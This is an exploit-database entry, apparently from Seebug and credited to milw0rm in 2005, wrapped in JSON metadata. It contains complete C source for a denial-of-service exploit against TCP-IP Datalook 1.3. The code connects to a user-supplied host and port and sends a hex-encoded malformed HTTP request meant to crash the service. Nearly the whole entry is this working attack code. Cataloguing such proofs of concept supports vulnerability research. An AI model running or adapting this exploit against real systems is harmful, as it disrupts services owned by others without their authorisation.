TCP-IP Datalook <= 1.3 Local Denial of Service Exploit

2005-06-25T00:00:00

Description

No description provided by source.

{"sourceData": "\n /*\r\n\r\n IP-DATALOOK Local DoS Exploit\r\n---------------------------------\r\nINFGP - Hacking&security Research\r\n\r\nResolve host...[OK]\r\n [+] Connecting...[OK]\r\nTarget locked\r\nSending bad procedure...[OK]\r\n [*] Server Disconnected!\r\n\r\n Tested on Windows2000 SP4\r\n Infos: infamous.2hell.com / basher13@linuxmail.org\r\n\r\n*/\r\n\r\n#include string.h\r\n#include winsock2.h\r\n#include stdio.h\r\n\r\n#pragma comment(lib, "ws2_32.lib")\r\n\r\nchar doscore[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"\r\n"\\x3f\\x3f\\x3f\\x3f\\x3f\\x2e\\x48\\x54\\x4d\\x4c\\x3f\\x74\\x65\\x73\\x74\\x76"\r\n"\\x61\\x72\\x69\\x61\\x62\\x6c\\x65\\x3d\\x26\\x6e\\x65\\x78\\x74\\x74\\x65\\x73"\r\n"\\x74\\x76\\x61\\x72\\x69\\x61\\x62\\x6c\\x65\\x3d\\x67\\x69\\x66\\x20\\x48\\x54"\r\n"\\x54\\x50\\x2f\\x31\\x2e\\x31\\x0a\\x52\\x65\\x66\\x65\\x72\\x65\\x72\\x3a\\x20"\r\n"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6c\\x6f\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74"\r\n"\\x2f\\x62\\x6f\\x62\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x54\\x79\\x70"\r\n"\\x65\\x3a\\x20\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78"\r\n"\\x2d\\x77\\x77\\x77\\x2d\\x66\\x6f\\x72\\x6d\\x2d\\x75\\x72\\x6c\\x65\\x6e\\x63"\r\n"\\x6f\\x64\\x65\\x64\\x0a\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3a"\r\n"\\x20\\x4b\\x65\\x65\\x70\\x2d\\x41\\x6c\\x69\\x76\\x65\\x0a\\x43\\x6f\\x6f\\x6b"\r\n"\\x69\\x65\\x3a\\x20\\x56\\x41\\x52\\x49\\x41\\x42\\x4c\\x45\\x3d\\x53\\x45\\x43"\r\n"\\x55\\x52\\x49\\x54\\x59\\x2d\\x50\\x52\\x4f\\x54\\x4f\\x43\\x4f\\x4c\\x53\\x3b"\r\n"\\x20\\x70\\x61\\x74\\x68\\x3d\\x2f\\x0a\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65"\r\n"\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x37\\x36"\r\n"\\x20\\x5b\\x65\\x6e\\x5d\\x20\\x28\\x58\\x31\\x31\\x3b\\x20\\x55\\x3b\\x20\\x4c"\r\n"\\x69\\x6e\\x75\\x78\\x20\\x32\\x2e\\x34\\x2e\\x32\\x2d\\x32\\x20\\x69\\x36\\x38"\r\n"\\x36\\x29\\x0a\\x56\\x61\\x72\\x69\\x61\\x62\\x6c\\x65\\x3a\\x20\\x72\\x65\\x73"\r\n"\\x75\\x6c\\x74\\x0a\\x48\\x6f\\x73\\x74\\x3a\\x20\\x6c\\x6f\\x63\\x61\\x6c\\x68"\r\n"\\x6f\\x73\\x74\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x6c\\x65\\x6e\\x67"\r\n"\\x74\\x68\\x3a\\x20\\x20\\x20\\x20\\x20\\x35\\x31\\x33\\x0a\\x41\\x63\\x63\\x65"\r\n"\\x70\\x74\\x3a\\x20\\x69\\x6d\\x61\\x67\\x65\\x2f\\x67\\x69\\x66\\x2c\\x20\\x69"\r\n"\\x6d\\x61\\x67\\x65\\x2f\\x78\\x2d\\x78\\x62\\x69\\x74\\x6d\\x61\\x70\\x2c\\x20"\r\n"\\x69\\x6d\\x61\\x67\\x65\\x2f\\x6a\\x70\\x65\\x67\\x2c\\x20\\x69\\x6d\\x61\\x67"\r\n"\\x65\\x2f\\x70\\x6a\\x70\\x65\\x67\\x2c\\x20\\x69\\x6d\\x61\\x67\\x65\\x2f\\x70"\r\n"\\x6e\\x67\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\\x45\\x6e\\x63\\x6f\\x64\\x69"\r\n"\\x6e\\x67\\x3a\\x20\\x67\\x7a\\x69\\x70\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d"\r\n"\\x4c\\x61\\x6e\\x67\\x75\\x61\\x67\\x65\\x3a\\x20\\x65\\x6e\\x0a\\x41\\x63\\x63"\r\n"\\x65\\x70\\x74\\x2d\\x43\\x68\\x61\\x72\\x73\\x65\\x74\\x3a\\x20\\x69\\x73\\x6f"\r\n"\\x2d\\x38\\x38\\x35\\x39\\x2d\\x31\\x2c\\x2a\\x2c\\x75\\x74\\x66\\x2d\\x38\\x0a"\r\n"\\x0a\\x0a\\x77\\x68\\x61\\x74\\x79\\x6f\\x75\\x74\\x79\\x70\\x65\\x64\\x3d\\x41"\r\n"\\x69\\x6d\\x61\\x67\\x65\\r\\n";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\nWSADATA wsaData;\r\nWORD wVersionRequested;\r\nstruct hostent *pTarget;\r\nstruct sockaddr_in sock;\r\nchar *target;\r\nint port,bufsize;\r\nSOCKET inetdos;\r\n\r\nif (argc < 2)\r\n{\r\nprintf(" \\n", argv[0]);\r\nprintf(" IP-DATALOOK Local DoS Exploit \\n", argv[0]);\r\nprintf(" -------------------------------------\\n", argv[0]);\r\nprintf(" INFGP - Hacking&Security Research\\n\\n", argv[0]);\r\nprintf("[-]Usage: %s [target] [port]\\n", argv[0]);\r\nprintf("[?]Exam: localhost 80\\n", argv[0]);\r\nexit(1);\r\n}\r\n\r\nwVersionRequested = MAKEWORD(1, 1);\r\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\ntarget = argv[1];\r\nport = 80;\r\n\r\nif (argc >= 3) port = atoi(argv[2]);\r\nbufsize = 1024;\r\nif (argc >= 4) bufsize = atoi(argv[3]);\r\n\r\ninetdos = socket(AF_INET, SOCK_STREAM, 0);\r\nif(inetdos==INVALID_SOCKET)\r\n{\r\nprintf("Socket ERROR \\n");\r\nexit(1);\r\n}\r\n\r\nprintf("Resolve host... ");\r\nif ((pTarget = gethostbyname(target)) == NULL)\r\n{\r\nprintf("FAILED \\n", argv[0]);\r\nexit(1);\r\n}\r\nprintf("[OK]\\n ");\r\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\nsock.sin_family = AF_INET;\r\nsock.sin_port = htons((USHORT)port);\r\n\r\nprintf("[+] Connecting... ");\r\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))\r\n{\r\nprintf("FAILED\\n");\r\nexit(1);\r\n}\r\nprintf("[OK]\\n");\r\nprintf("Target locked\\n");\r\nprintf("Sending bad procedure... ");\r\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)\r\n{\r\nprintf("ERROR\\n");\r\nclosesocket(inetdos);\r\nexit(1);\r\n}\r\nprintf("[OK]\\n ");\r\nprintf("[+] Server Disconnected!\\n");\r\nclosesocket(inetdos);\r\nWSACleanup();\r\nreturn 0;\r\n}\n\n// milw0rm.com [2005-06-25]\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15612", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-15612", "type": "seebug", "viewCount": 13, "references": [], "lastseen": "2017-11-19T21:24:35", "published": "2005-06-25T00:00:00", "cvelist": [], "id": "SSV:15612", "enchantments_done": [], "modified": "2005-06-25T00:00:00", "title": "TCP-IP Datalook <= 1.3 Local Denial of Service Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 7.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647702567, "score": 1683911323, "epss": 1678851499}, "_internal": {"score_hash": "51fd9be903cd7662834518983f43e538"}}

TCP-IP Datalook &lt;= 1.3 Local Denial of Service Exploit

Description

TCP-IP Datalook <= 1.3 Local Denial of Service Exploit